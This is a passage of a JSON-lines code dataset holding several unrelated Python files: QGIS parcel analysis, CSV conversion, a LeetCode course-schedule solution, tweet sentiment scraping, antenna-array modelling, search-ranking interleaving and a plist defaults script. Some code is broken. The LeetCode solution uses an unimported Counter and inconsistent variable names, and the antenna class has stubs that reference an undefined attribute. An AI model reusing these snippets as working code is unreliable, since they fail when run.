None:\n ui.statusbar.showMessage('Exiting... select the layer result file')\n return\n if ui.resultOverlayCkB.isChecked():\n if layer_overlay_result_file is None:\n ui.statusbar.showMessage('Exiting... select the overlay layer result file')\n return\n\n #layer_base = qgis.core.QgsVectorLayer(\n # r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Datasets\\Hondo_Parcels_2019_Dissolve_4326.shp')\n\n #layer_comparison = qgis.core.QgsVectorLayer(\n # r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Datasets\\Hondo_Parcels_2022_Dissolve_4326.shp')\n #layer_overlay = qgis.core.QgsVectorLayer(r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Datasets\\zoning_4326.shp')\n #layer_result_file = r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Results\\market_value.gpkg'\n\n if ui.resultCkB.isChecked():\n layer_result = qgis.core.QgsVectorLayer('Polygon?crs=' + layer_comparison.crs().authid() +\n '&field='+ ui.comparisonCB.currentText()+':string(25)&field=OWNER_NAME:string(70)&field=PCT_CHANGE:double' \\\n '&field=BASE_VALUE:double&field=NEW_VALUE:double',\n 'results', 'memory')\n\n #layer_overlay_result_file = r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Results\\overlay_result.gpkg'\n\n if ui.resultOverlayCkB.isChecked():\n layer_overlay_result = qgis.core.QgsVectorLayer('Polygon?crs=' + layer_overlay.crs().authid() +\n '&field=ID:string(25)' \\\n '&field=DESC:string(80)' \\\n '&field=AVERAGE:double' \\\n '&field=MEDIAN:double',\n 'overlay_results', 'memory')\n\n for field in layer_base.fields():\n print(field.name())\n print(field.typeName())\n print(field.length())\n print(field.isNumeric())\n print('----------')\n\n for feature in layer_base.getFeatures():\n dict_base[str(feature[ui.baseCB.currentText()])] = feature\n\n print('Dictionary base length ' + str(len(dict_base)))\n\n print('')\n print('++++++++++++++')\n for field in layer_overlay.fields():\n print(field.name())\n print(field.typeName())\n print(field.length())\n print(field.isNumeric())\n print('----------')\n\n\n for feature in layer_comparison.getFeatures():\n dict_comparison[str(feature[ui.comparisonCB.currentText()])] = feature\n\n\n for feature in layer_overlay.getFeatures():\n dict_overlay[str(feature['gid'])] = overlay.Overlay(feature)\n\n\n\n\n\n # Find features in comparison layer that are in the base layer to evaluate the change in market value\n # As these feature are found create a new layer with the percentage change in market value.\n\n features_result = []\n\n for id_compare in dict_comparison:\n print(id_compare)\n #if id_compare == '1985':\n # print('Found 1985')\n feature_comparison = dict_comparison[id_compare]\n if feature_comparison[ui.comparisonParamCB.currentText()] > 0:\n\n if id_compare in dict_base:\n #print(id_base)\n feature_base = dict_base[id_compare]\n\n #print(feature_base[ui.baseParamCB.currentText()])\n if feature_base[ui.baseParamCB.currentText()] > 0:\n pct_change = 100 * (feature_comparison[ui.comparisonParamCB.currentText()] - feature_base[ui.baseParamCB.currentText()]) / feature_base[ui.baseParamCB.currentText()]\n feature_new = qgis.core.QgsFeature()\n feature_new.setAttributes([str(feature_comparison[ui.comparisonCB.currentText()]), feature_comparison['OWNER_NAME'],\n pct_change, feature_base[ui.baseParamCB.currentText()], feature_comparison[ui.comparisonParamCB.currentText()]])\n feature_new.setGeometry(feature_comparison.geometry())\n features_result.append(feature_new)\n\n element = overlay.OverlayElement(str(feature_comparison[ui.comparisonCB.currentText()]), feature_comparison.geometry(),\n feature_base[ui.baseParamCB.currentText()], feature_comparison[ui.comparisonParamCB.currentText()])\n for id_overlay in dict_overlay:\n if dict_overlay[id_overlay].feature.geometry().contains(feature_comparison.geometry().centroid()):\n dict_overlay[id_overlay].addElement(element)\n\n if ui.resultCkB.isChecked():\n resultProvider = layer_result.dataProvider()\n resultProvider.addFeatures(features_result)\n print(len(features_result))\n\n\n overlay_result = []\n num_elements = 0\n\n for id_overlay in dict_overlay:\n num_elements += (len(dict_overlay[id_overlay].elements))\n print('Number of elements in Overlay: ' + str(id_overlay) + ' : ' + str((len(dict_overlay[id_overlay].elements))))\n\n feature_overlay = qgis.core.QgsFeature()\n dict_overlay[id_overlay].calculateAverage()\n dict_overlay[id_overlay].calculateMedian()\n feature_overlay.setAttributes([str(id_overlay), str(dict_overlay[id_overlay].feature[\"layer\"]) +\n ': ' +\n str(dict_overlay[id_overlay].feature[\"label\"]),\n dict_overlay[id_overlay].average_change,\n dict_overlay[id_overlay].median_change])\n feature_overlay.setGeometry(dict_overlay[id_overlay].feature.geometry())\n overlay_result.append(feature_overlay)\n\n if ui.resultOverlayCkB.isChecked():\n overlayProvider = layer_overlay_result.dataProvider()\n overlayProvider.addFeatures(overlay_result)\n\n print('Total elements: ' + str(num_elements))\n if ui.resultCkB.isChecked():\n qgis.core.QgsVectorFileWriter.writeAsVectorFormat(layer_result, layer_result_file, \"utf-8\", layer_comparison.crs(), \"GPKG\")\n if ui.resultOverlayCkB.isChecked():\n qgis.core.QgsVectorFileWriter.writeAsVectorFormat(layer_overlay_result, layer_overlay_result_file, \"utf-8\", layer_overlay.crs(), \"GPKG\")\n\n\n# ==========================================\n# connect signals\n# ==========================================\nui.baseTB.clicked.connect(selectBaseShapefile)\nui.comparisonTB.clicked.connect(selectComparisonShapefile)\nui.overlayTB.clicked.connect(selectOverlayShapefile)\nui.resultTB.clicked.connect(selectNewResultGPKGfile)\nui.resultOverlayTB.clicked.connect(selectNewOverlayResultGPKGfile)\nui.runPB.clicked.connect(processData)\nui.resultCkB.clicked.connect(resultToggle)\nui.resultOverlayCkB.clicked.connect(resultOverlayToggle)\nui.baseLE.editingFinished.connect(updateBaseCB)\nui.baseLE.editingFinished.connect(updateBaseParamCB)\nui.comparisonLE.editingFinished.connect(updateComparisonCB)\nui.comparisonLE.editingFinished.connect(updateComparisonParamCB)\n\n# =======================================\n# run app\n# =======================================\nmainWindow.show()\n\nqgs.exitQgis()\nsys.exit(app.exec_())\n","repo_name":"gradams555/FINAL_PROJECT","sub_path":"Development/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25780645915","text":"import csv\nimport xlwt\n\n# csvReader读取文件\ndef csvRead(csvPath):\n csvFile = csv.reader(open(csvPath, 'r', encoding=\"utf8\"))\n return csvFile\n\n# csv写文件\ndef csvWrite(csvPath):\n csvFile = open(csvPath, 'w', encoding='utf8', newline='')\n writer = csv.writer(csvFile)\n return writer\n\n# csv转化为excel\ndef csv_to_xlsx(readPath,writePath):\n with open(readPath, 'r', encoding='utf-8') as f:\n read = csv.reader(f)\n workbook = xlwt.Workbook()\n sheet = workbook.add_sheet('data') # 创建一个sheet表格\n l = 0\n for line in read:\n r = 0\n for i in line:\n sheet.write(l, r, i) # 一个一个将单元格数据写入\n r = r + 1\n l = l + 1\n\n workbook.save(writePath) # 保存Excel\n\nreadPathList=['resultlabelB1','resultlabelB5','resultlabelB10','resultlabelF1','resultlabelF5','resultlabelF10']\nfor readPath in readPathList:\n rPath='../data/%s.csv'%readPath\n wPath='../data/%s.xls'%readPath\n csv_to_xlsx(rPath,wPath)","repo_name":"ZBayes/tool_lib","sub_path":"csv_tool.py","file_name":"csv_tool.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"8991766892","text":"# Author: RT\n# Date: 2023-07-13T23:10:11.531Z\n# URL: https://leetcode.com/problems/course-schedule/\n\n\nfrom collections import defaultdict\n\n\nclass Solution:\n def canfinish(self, numcourses: int, prerequisites: list[list[int]]) -> bool:\n radj = defaultdict(list)\n deps_count = Counter()\n # b is prerequisite of a\n for a, b in prerequisites:\n radj[b].append(a)\n deps_count[a] += 1\n\n can_take = []\n for course in range(numCourses):\n if not deps_count[course]:\n can_take.append(course)\n\n taken = 0\n while can_take:\n new_can_take = []\n\n for to_take in can_take:\n taken += 1\n for course in radj[to_take]:\n deps_count[course] -= 1\n if deps_count[course] == 0:\n new_can_take.append(course)\n\n can_take = new_can_take\n\n return taken == numCourses\n","repo_name":"Roytangrb/dsa","sub_path":"leetcode/python/207-course-schedule.py","file_name":"207-course-schedule.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"2953997336","text":"# for tweet API\nimport pandas as pd\nimport time\nimport numpy as np\nimport os\nimport re\nimport contractions\nimport nltk\nimport tweepy \nimport seaborn as sns\nfrom datetime import date\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nsentiment=SentimentIntensityAnalyzer()\nwords=set(nltk.corpus.words.words())\ndef get_api():\n consumer_key = os.environ['consumer_key']\n consumer_secret = os.environ['consumer_secret']\n access_key= os.environ['access_key']\n access_secret = os.environ['access_secret']\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_key, access_secret)\n api = tweepy.API(auth,wait_on_rate_limit=True,wait_on_rate_limit_notify=True)\n return api\ndef clean_txt(input_txt, pattern):\n #removing hashtags,emojis,stopwords\n input_txt=re.sub(r'#[\\w]*','',input_txt)\n input_txt=input_txt.encode(\"ascii\",\"ignore\")\n input_txt=input_txt.decode()\n \n ##removing @user\n r = re.findall(pattern, input_txt)\n for i in r:\n input_txt = re.sub(i, '', input_txt)\n \n #removing stopwords \n input_txt = ' '.join([i for i in input_txt.split() if not i in words])\n #contractions\n input_txt=contractions.fix(input_txt)\n #removing punctuation,numbers and whitespace \n res=re.sub(r'[^\\w\\s]', '', input_txt.lower())\n res=re.sub('\\s+',' ',res)\n ##removing links\n res=re.sub(r'https[\\w]*', '', res, flags=re.MULTILINE)\n #removing acronyms\n res=''.join(i for i in res if not i.isdigit())\n res=' '.join([i for i in res.split() if len(i)>2])\n lem = WordNetLemmatizer()\n res = lem.lemmatize(res)\n \n return res\ndef get_sentiment(data):\n ss=[]\n for _,row in data.iterrows():\n sent_dict=sentiment.polarity_scores(row['Clean Tweets'])\n if(sent_dict['compound']>=0.05):\n ss.append(\"POSITIVE\")\n elif(sent_dict['compound']<=-0.05):\n ss.append(\"NEGATIVE\")\n else:\n ss.append(\"NEUTRAL\")\n return ss\ndef get_data(keyword,api):\n data={\"Date\":[],\"Tweet\":[],\"Tweet Source\":[],\"Retweets\":[],\"Likes\":[],\"Location\":[]}\n for tweet in tweepy.Cursor(api.search,q=keyword+\"-filter:retweets\",count=1000,lang=\"en\",until=date.today(),tweet_mode=\"extended\").items():\n if(len(data['Tweet'])<1000):\n #st.write(\"Tweets extracted\",len(data['Tweet']))\n data['Date'].append(tweet.created_at)\n data['Tweet'].append(tweet.full_text)\n data['Location'].append(tweet.user.location)\n data['Tweet Source'].append(tweet.source)\n data['Retweets'].append(tweet.retweet_count)\n data['Likes'].append(tweet.favorite_count)\n else:\n break\n data=pd.DataFrame.from_dict(data,orient=\"index\").transpose()\n data['Clean Tweets']=[clean_txt(row['Tweet'],\"@[\\w]*\") for _,row in data.iterrows()]\n data['SS']=get_sentiment(data)\n data['Date']=pd.to_datetime(data['Date'])\n return data\n","repo_name":"thedatanecdotes/project-search-bar","sub_path":"src/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74883619600","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 9 11:52:08 2020\r\n\r\n@author: drsmith\r\n\r\nClass: SystemArchitecture\r\n\r\nThe SystemArchitecture class creates objects that contain all aspects of the system, including the dipole layout\r\nand any feed structure.\r\n\r\n\"\"\"\r\n\r\nimport scipy as sc\r\nimport numpy as np\r\nimport scipy.constants\r\nfrom metaworks.ElementProperties import ElementProperties\r\n# from scipy import linalg\r\n\r\nclass SystemArchitecture:\r\n # The SystemArchitecture class defines an arbitrary dipole layout and feed structure. \r\n # Note that to keep consistent with the usual definitions of phi and theta, the antenna aperture is in the xz-plane\r\n # for 2D apertures, with y being the broadside direction. This means that the phi angle is in the xy plane,\r\n # as usually defined, with phi=90 degrees being the broadside direction and phi=0 being the positive x-axis.\r\n \r\n # Define a set of useful constants\r\n C = scipy.constants.c\r\n EPS_0 = scipy.constants.epsilon_0 #C^2/(N*m^2)\r\n MU_0 = scipy.constants.mu_0 #m kg s^-2 A^-2\r\n cm = 0.01\r\n GHz = 1.0E9\r\n \r\n # If no input parameters provided, use a default set.\r\n # For the default, assume the operating wavelength is 10 GHz.\r\n # The antenna is 1D, lambda/4 spacing of 31 elements (0.75 cm).\r\n \r\n freq_op_default = 10*GHz\r\n positions_x_default, dipoleSpacingX_default = np.linspace(0.0*cm, 22.5*cm, 31, retstep=True)\r\n positions_y_default = np.zeros(31)\r\n dipoleID_default = np.arange(31)\r\n alpha_default = np.ones(31)\r\n dipole_layout_default = np.vstack((dipoleID_default,positions_x_default,positions_y_default,alpha_default))\r\n \r\n # For the feed properties, what matters is the field at the position of each dipole.\r\n # The type of feed changes the calculation for the feed mode, with the field at each dipole finally saved.\r\n \r\n feed_type_default = 'plane wave'\r\n \r\n \r\n def __init__(self, freq_op: float = freq_op_default, feed_type: str = feed_type_default,\r\n dipole_layout: list = dipole_layout_default):\r\n\r\n self.freq_op = freq_op\r\n self.wavelength_op=self.C/self.freq_op\r\n self.dipoleID = dipole_layout[0,:]\r\n self.positions_x = dipole_layout[1,:]\r\n self.positions_y = dipole_layout[2,:] \r\n self.alpha = dipole_layout[3,:]\r\n self.dipoleLayout = dipole_layout\r\n self.numDipolesX = len(self.dipoleID)\r\n self.numDipolesY = 1\r\n self._dipoleType = 'ideal-unconstrained'\r\n self.dipoleProperties = ElementProperties()\r\n self.layoutType = 'linear 1D'\r\n self.apertureDimension = 1\r\n self.dipoleSpacingX= self.positions_x[1]-self.positions_x[0]\r\n self.dipoleSpacingY= None\r\n self.apertureSizeX= self.dipoleSpacingX * self.numDipolesX\r\n self.apertureSizeY= None\r\n self.modulationType = None\r\n \r\n #\r\n # Feed attributes\r\n self.feed_type = feed_type\r\n self._guideIndex = 2.5\r\n self.betaX = None\r\n self.betaY = None\r\n self.k0 = 2*sc.pi*self.freq_op/self.C\r\n self.nx = 1.0\r\n self.ny = 0.0\r\n self.hy = np.ones(self.numDipolesX)\r\n \r\n # Calculate the incident field distribution for the default feed structure:\r\n self.feed_architecture(feed_type = self.feed_type, set=True)\r\n\r\n# The following set of functions allow access to class properties, allowing validation of input and self-constinency when parameters are changed. \r\n\r\n @property\r\n def dipole_type(self):\r\n return self._dipoleType\r\n\r\n @dipole_type.setter\r\n def dipole_type(self, value):\r\n selection = None\r\n properties = ('ideal', 'ideal-unconstrained', 'ideal-magnitude-only', 'ideal-constrained-lorentzian',\r\n 'lorentzian-limited-tuning')\r\n if value == 'help':\r\n print('Supported dipole types are: ideal, ideal-unconstrained, ideal-magnitude-only, ideal-constrained-lorentzian')\r\n return\r\n else:\r\n for property in properties:\r\n if value == property:\r\n selection = value\r\n if selection != None:\r\n self._dipoleType = selection\r\n else:\r\n print(value + ' is not a supported type')\r\n if value == 'lorentzian-limited-tuning':\r\n self.dipoleProperties.set_lorentzian_dipole_parameters(tuning_frequency_low = 9.5*self.GHz, tuning_frequency_high=10.5*self.GHz,\r\n operating_frequency=self.freq_op)\r\n \r\n @property\r\n def guide_index(self):\r\n return self._guideIndex\r\n\r\n @guide_index.setter\r\n def guide_index(self, value):\r\n self._guideIndex = value\r\n if self.apertureDimension == 1:\r\n self.feed_architecture(feed_type = self.feed_type, set=True)\r\n else:\r\n self.feed_architecture_2D(feed_type=self.feed_type, set=True)\r\n\r\n def make_linear_array(self, spc, **kwargs):\r\n self.apertureDimension = 1\r\n apSize = kwargs.get('aperture_size')\r\n num = kwargs.get('number_elements')\r\n self.layoutType = 'linear 1D'\r\n if apSize == None:\r\n apSize = (num-1)*spc\r\n else:\r\n num = int(np.floor(apSize/spc)+1)\r\n self.dipoleSpacingX = spc\r\n self.apertureSizeX = apSize\r\n self.positions_x = np.linspace(0.0*self.cm, spc*(num-1), num)\r\n self.numDipolesX = num\r\n self.numDipolesY = 1\r\n self.dipoleID = np.arange(num)\r\n self.positions_y = np.zeros(num)\r\n self.alpha = np.ones(num)\r\n self.dipoleLayout= np.vstack((self.dipoleID, self.positions_x, self.positions_y, self.alpha))\r\n\r\n self.feed_architecture(self.feed_type, set=True)\r\n\r\n def make_linear_2D_array(self, spcx, spcy, **kwargs):\r\n self.apertureDimension=2\r\n self.layoutType = 'linear 2D'\r\n apSizeX = kwargs.get('aperture_size_x')\r\n numx = kwargs.get('number_elements_x')\r\n if apSizeX == None:\r\n apSizeX = (numx-1)*spcx\r\n else:\r\n numx = np.floor(apSizeX/spcx)+1\r\n apSizeY = kwargs.get('aperture_size_y')\r\n numy = kwargs.get('number_elements_y')\r\n if apSizeY == None:\r\n apSizeY = (numy-1)*spcy\r\n else:\r\n numy = np.floor(apSizeY/spcy)+1\r\n self.dipoleSpacingX = spcx\r\n self.dipoleSpacingY = spcy\r\n self.apertureSizeX = apSizeX\r\n self.apertureSizeY = apSizeY\r\n u, v = np.mgrid[0.0*self.cm:spcy*(numy-1):1j*numy,0.0*self.cm:spcx*(numx-1):1j*numx]\r\n self.positions_x = v.ravel()\r\n self.positions_y = u.ravel()\r\n self.numDipoles = numx*numy\r\n self.numDipolesX = numx\r\n self.numDipolesY = numy\r\n self.dipoleID = np.arange(self.numDipoles)\r\n self.alpha = np.ones(self.numDipoles)\r\n self.dipoleLayout= np.vstack((self.dipoleID, self.positions_x, self.positions_y, self.alpha))\r\n \r\n self.feed_architecture_2D(feed_type=self.feed_type, set=True)\r\n \r\n \r\n def summarize_parameters(self):\r\n print('Operating Frequency: ' + str(self.freq_op/self.GHz) + ' GHz')\r\n print('Operating Wavelength: ' + str(self.wavelength_op/self.cm) + ' cm')\r\n print('Dipole Type: ' + self._dipoleType)\r\n print('Layout Type: ' + self.layoutType)\r\n if self.apertureDimension == 1:\r\n print('Dipole Spacing: ' + str(self.dipoleSpacingX/self.cm) + ' cm')\r\n print('Aperture Size: ' + str(self.apertureSizeX/self.cm) + ' cm')\r\n print('Number of Dipoles: ' + str(self.numDipolesX))\r\n else:\r\n print('Dipole Spacing along x: ' + str(self.dipoleSpacingX/self.cm) + ' cm')\r\n print('Dipole Spacing along y: ' + str(self.dipoleSpacingY/self.cm) + ' cm')\r\n print('Aperture Size along x: ' + str(self.apertureSizeX/self.cm) + ' cm')\r\n print('Aperture Size along y: ' + str(self.apertureSizeY/self.cm) + ' cm')\r\n print('Number of Dipoles along x: ' + str(self.numDipolesX))\r\n print('Number of Dipoles along y: ' + str(self.numDipolesY)) \r\n print('Feed Type: ' + self.feed_type)\r\n print('Waveguide Index: ' + str(self.guide_index))\r\n print('Modulation Type: ' + str(self.modulationType))\r\n \r\n def feed_architecture(self, xpos=0, **kwargs):\r\n # Based on the feed type, select the appropriate function. The functions corresponding to different\r\n # feeds are specified below.\r\n \r\n def plane_wave(xpos=0, **kwargs):\r\n if kwargs.get('set') == True:\r\n self.betaX = (2*sc.pi*self.freq_op/self.C)*self.guide_index*self.nx\r\n self.hy = np.exp(-np.multiply(1j,self.betaX*self.positions_x))\r\n elif kwargs.get('sample') == True:\r\n return np.exp(-np.multiply(1j, np.multiply(self.betaX, xpos)))\r\n \r\n def microstrip():\r\n return self.freq * 1\r\n\r\n def rectangular_waveguide():\r\n return self.freq * .5\r\n\r\n choices = {\r\n 'plane wave': plane_wave,\r\n 'microstrip': microstrip,\r\n 'rectangular waveguide': rectangular_waveguide \r\n }\r\n \r\n if kwargs.get('feed_type') != None:\r\n feed_type = kwargs.get('feed_type')\r\n feed_func = choices.get(feed_type)\r\n else:\r\n feed_type = self.feed_type\r\n feed_func = choices.get(feed_type)\r\n if kwargs.get('set') == True:\r\n feed_func(set=True)\r\n elif kwargs.get('sample') == True:\r\n return feed_func(xpos, sample=True)\r\n \r\n def feed_architecture_2D(self, xpos=0, ypos=0, **kwargs):\r\n # Based on the feed type, select the appropriate function. The functions corresponding to different\r\n # feeds are specified below.\r\n \r\n def plane_wave_2D(xpos=0, ypos=0, **kwargs):\r\n if kwargs.get('set') == True:\r\n self.betaX = (2*sc.pi*self.freq_op/self.C)*self.guide_index*self.nx\r\n self.betaY = (2*sc.pi*self.freq_op/self.C)*self.guide_index*self.ny\r\n self.hy = np.multiply(np.exp(-np.multiply(1j,self.betaX*self.positions_x)), np.exp(-np.multiply(1j,self.betaY*self.positions_y)))\r\n elif kwargs.get('sample') == True:\r\n return np.multiply(np.exp(-np.multiply(1j,np.multiply(self.betaX,xpos))), np.exp(-np.multiply(1j,np.multiply(self.betaY, ypos))))\r\n \r\n def microstrip_2D():\r\n self.freq = self.freq_op #!!edited\r\n return self.freq * 1\r\n\r\n def rectangular_waveguide_2D():\r\n self.freq = self.freq_op #!!edited\r\n return self.freq * .5\r\n\r\n choices = {\r\n 'plane wave': plane_wave_2D,\r\n 'microstrip': microstrip_2D,\r\n 'rectangular waveguide': rectangular_waveguide_2D \r\n }\r\n \r\n if kwargs.get('feed_type') != None:\r\n feed_type = kwargs.get('feed_type')\r\n feed_func = choices.get(feed_type)\r\n else:\r\n feed_type = self.feed_type\r\n feed_func = choices.get(feed_type)\r\n if kwargs.get('set')==True:\r\n feed_func(set=True)\r\n elif kwargs.get('sample') == True:\r\n return feed_func(xpos, ypos, sample=True) \r\n\r\n \r\n","repo_name":"drsmith706/metaworks_pub","sub_path":"metaworks/SystemArchitecture.py","file_name":"SystemArchitecture.py","file_ext":"py","file_size_in_byte":11533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"198369236","text":"# This file is part of Lerot.\n#\n# Lerot is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Lerot is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with Lerot. If not, see .\n\n# KH, 2012/06/19\n\nimport argparse\n\nfrom numpy import asarray, e, log, where, exp\nfrom random import randint\n\nfrom .AbstractInterleavedComparison import AbstractInterleavedComparison\nfrom ..utils import split_arg_str\n\n\nclass ProbabilisticInterleave(AbstractInterleavedComparison):\n \"\"\"Probabilistic interleaving, marginalizes over assignments\"\"\"\n\n def __init__(self, arg_str=None):\n if arg_str:\n parser = argparse.ArgumentParser(description=\"Parse arguments for \"\n \"interleaving method.\", prog=self.__class__.__name__)\n parser.add_argument(\"-a\", \"--aggregate\", choices=[\"expectation\",\n \"log-likelihood-ratio\", \"likelihood-ratio\", \"log-ratio\",\n \"binary\"])\n parser.add_argument(\"-d\", \"--det_interleave\", type=bool,\n help=\"If true, use deterministic interleaving, regardless \"\n \"of the ranker type used for comparison.\")\n parser.add_argument(\"-t\", \"--compare_td\", type=bool,\n help=\"If true, compare rankers using observed assignments \"\n \"instead of marginalizing over possible assignments.\")\n args = vars(parser.parse_known_args(split_arg_str(arg_str))[0])\n if \"aggregate\" in args and args[\"aggregate\"]:\n self.aggregate = args[\"aggregate\"]\n if \"det_interleave\" in args and args[\"det_interleave\"]:\n self.det_interleave = True\n if \"compare_td\" in args and args[\"compare_td\"]:\n self.compare_td = True\n if not hasattr(self, \"aggregate\") or not self.aggregate:\n self.aggregate = \"expectation\"\n if not hasattr(self, \"det_interleave\"):\n self.det_interleave = False\n if not hasattr(self, \"compare_td\"):\n self.compare_td = False\n\n def interleave(self, r1, r2, query, length):\n r1.init_ranking(query)\n r2.init_ranking(query)\n length = min(r1.document_count(), r2.document_count(), length)\n # start with empty document list\n l = []\n # random bits indicate which r to use at each rank\n a = asarray([randint(0, 1) for _ in range(length)])\n for next_a in a:\n # flip coin - which r contributes doc (pre-computed in a)\n select = r1 if (next_a == 0) else r2\n other = r2 if (next_a == 0) else r1\n # draw doc\n if self.det_interleave:\n pick = select.next_det()\n else:\n pick = select.next()\n l.append(pick)\n # let other ranker know that we removed this document\n try:\n other.rm_document(pick)\n except:\n pass\n return (asarray(l), (a, r1, r2))\n\n def infer_outcome(self, l, a, c, query):\n (td_a, r1, r2) = a\n\n # for comparisons with TD, use naive comparison\n if self.compare_td:\n c1 = sum([1 if val_a == 0 and val_c == 1 else 0\n for val_a, val_c in zip(td_a, c)])\n c2 = sum([1 if val_a == 1 and val_c == 1 else 0\n for val_a, val_c in zip(td_a, c)])\n return -1 if c1 > c2 else 1 if c2 > c1 else 0\n\n # comparison with marginalization\n # are there any clicks? (otherwise it's a tie)\n click_ids = where(asarray(c) == 1)\n if not len(click_ids[0]): # no clicks, will be a tie\n return 0, 0\n\n r1.init_ranking(query)\n r2.init_ranking(query)\n\n # enumerate all possible assignments that go with l, add their\n # outcomes weighted by probabilities\n # original outcome is not needed in this case, only clicks and probs\n root = SimpleBinaryTree(None, 0.0, 0) # root\n nextLevel = [root]\n currentLevel = []\n\n # traverse possible assignments breath-first\n log_p_a = len(l) * log(0.5)\n log_p_l = len(l) * log(0.5)\n\n for n in range(len(l)):\n currentLevel = nextLevel\n nextLevel = []\n p_r1 = r1.get_document_probability(l[n])\n p_r2 = r2.get_document_probability(l[n])\n # zero probability: observed list is not possible (e.g., with\n # deterministic rankers and historical data)\n if p_r1 == 0 and p_r2 == 0:\n return .0\n r1.rm_document(l[n])\n try:\n r2.rm_document(l[n])\n except:\n pass\n log_p_l += log(p_r1 + p_r2)\n\n for node in currentLevel:\n # expand children and add new nodes to queue for nextLevel\n # left child: r1 is selected, only expand if p > 0\n if p_r1 > 0:\n p_left = node.prob + log(0.5 * p_r1)\n o_left = node.outcome\n if c[n] == 1:\n o_left += -1\n node.left = SimpleBinaryTree(node, p_left, o_left)\n nextLevel.append(node.left)\n # right child: r2 is selected, only expand if p > 0\n if p_r2 > 0:\n p_right = node.prob + log(0.5 * p_r2)\n o_right = node.outcome\n if c[n] == 1:\n o_right += 1\n node.right = SimpleBinaryTree(node, p_right, o_right)\n nextLevel.append(node.right)\n # we have all log probabilities for outcomes =! 0\n o1 = 0.0\n o2 = 0.0\n for node in nextLevel:\n if node.outcome != 0:\n # log_p_a and log_p_l cancel out if we turn the outcome into a\n # ratio for now, keep them for clarity\n if node.outcome < 0:\n o1 += e ** (node.prob + log_p_a - log_p_l)\n else:\n o2 += e ** (node.prob + log_p_a - log_p_l)\n\n # return -1 if o1 > o2 else 1 if o2 > o1 else 0\n if o1 == o2:\n outcome = 0\n elif self.aggregate == \"expectation\":\n outcome = o2 - o1\n elif self.aggregate == \"log-likelihood-ratio\":\n if o1 > o2:\n outcome = log(o2 / o1)\n else:\n outcome = log(o1 / o2)\n elif self.aggregate == \"likelihood-ratio\":\n if o1 > o2:\n outcome = (float(o2) / o1) - 1\n else:\n outcome = 1 - (float(o1) / o2)\n elif self.aggregate == \"log-ratio\":\n if o1 > o2:\n outcome = float(log(o1)) / log(o2) - 1\n else:\n outcome = 1 - float(log(o2)) / log(o1)\n elif self.aggregate == \"binary\":\n outcome = -1 if o1 > o2 else 1 if o2 > o1 else 0\n else:\n raise ValueError(\"Unknown aggregation method: %s\", self.aggregate)\n return outcome, exp(log_p_l)\n\n def get_probability_of_list(self, result_list, context, query):\n # P(l) = \\prod_{doc in result_list} 1/2 P_1(doc) + 1/2 P_2(doc)\n p_l = 1.0\n (_, r1, r2) = context\n r1.init_ranking(query)\n r2.init_ranking(query)\n for _, doc in enumerate(result_list):\n p_r1 = r1.get_document_probability(doc)\n p_r2 = r2.get_document_probability(doc)\n r1.rm_document(doc)\n r2.rm_document(doc)\n p_l *= 0.5 * (p_r1 + p_r2)\n return p_l\n\n\nclass SimpleBinaryTree:\n \"\"\"tree that keeps track of outcome, probability of arriving at this\n outcome\"\"\"\n parent, left, right, prob, outcome = None, None, None, 0.0, 0\n\n def __init__(self, parent, prob, outcome):\n self.parent = parent\n self.prob = prob\n self.outcome = outcome\n","repo_name":"redreamality/learning-to-rank","sub_path":"lerot/comparison/ProbabilisticInterleave.py","file_name":"ProbabilisticInterleave.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"7049401116","text":"from .action import *\nfrom . import path, tools\n\ndefault_paths = path.configfiles(\"defaults/*\")\n\ndef get_file_arguments(plist_buddy, files):\n import shlex\n for file in files:\n with open(file, \"rt\") as buddy_file:\n first_line = buddy_file.readline()\n if not first_line.startswith(\"#!\"):\n continue\n first_line = first_line[2:]\n parts = shlex.split(first_line)\n while parts and \"plist-buddy\" not in parts[0]:\n del parts[0]\n if not parts:\n continue\n # parts[0] is now the plist-buddy call. Replace it with the given path\n parts[0] = plist_buddy\n parts.append(file)\n yield parts\n\ndef get_default_files(default_paths):\n from glob import glob\n \n files = []\n for default_path in path.expandusers(default_paths):\n files += glob(default_path)\n \n files.sort(key=path.basename)\n return files\n\n@default\n@action(\n default_paths=argument(\n help=\"the paths used for default files, with possible glob characters\",\n metavar=\"file\"\n )\n)\ndef apply_defaults(default_paths=default_paths):\n \"\"\"\n Applies defaults using plist-buddy. The defaults files are sorted alphabetically for the filename if necessary.\n \"\"\"\n plist_buddy = path.join(path.scriptdir, 'bin', 'plist-buddy')\n files = get_default_files(default_paths)\n for command in get_file_arguments(path.join(path.scriptdir, 'bin', 'plist-buddy'), files):\n print(\"Applying defaults from {}\".format(command[-1]))\n 